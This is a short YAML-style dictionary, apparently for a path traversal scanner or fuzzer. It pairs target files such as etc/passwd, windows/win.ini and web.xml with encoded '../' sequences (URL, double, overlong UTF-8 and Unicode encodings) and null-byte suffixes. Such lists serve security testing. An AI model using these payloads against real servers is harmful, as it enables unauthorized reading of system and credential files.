file_dict:
  - "web.xml"
  - "etc/passwd"
  - "index.jsp"
  - "windows/win.ini"
  - "package.json"
traversal_dict:
  - "../"
  - "..%2f"
  - ".%2e/"
  - ".%%32%65/"
  - "%u002e%u002e/"
  - "%c0%ae%c0%ae%c0%af"
  - "%ux%ux/"
  - "%..%../"
  - "%2e%2e%2f"
  - "..%u2215"
  - "..%c0%af"
suffix_dict:
  - ""
  - "\x00"
  - "\x00en"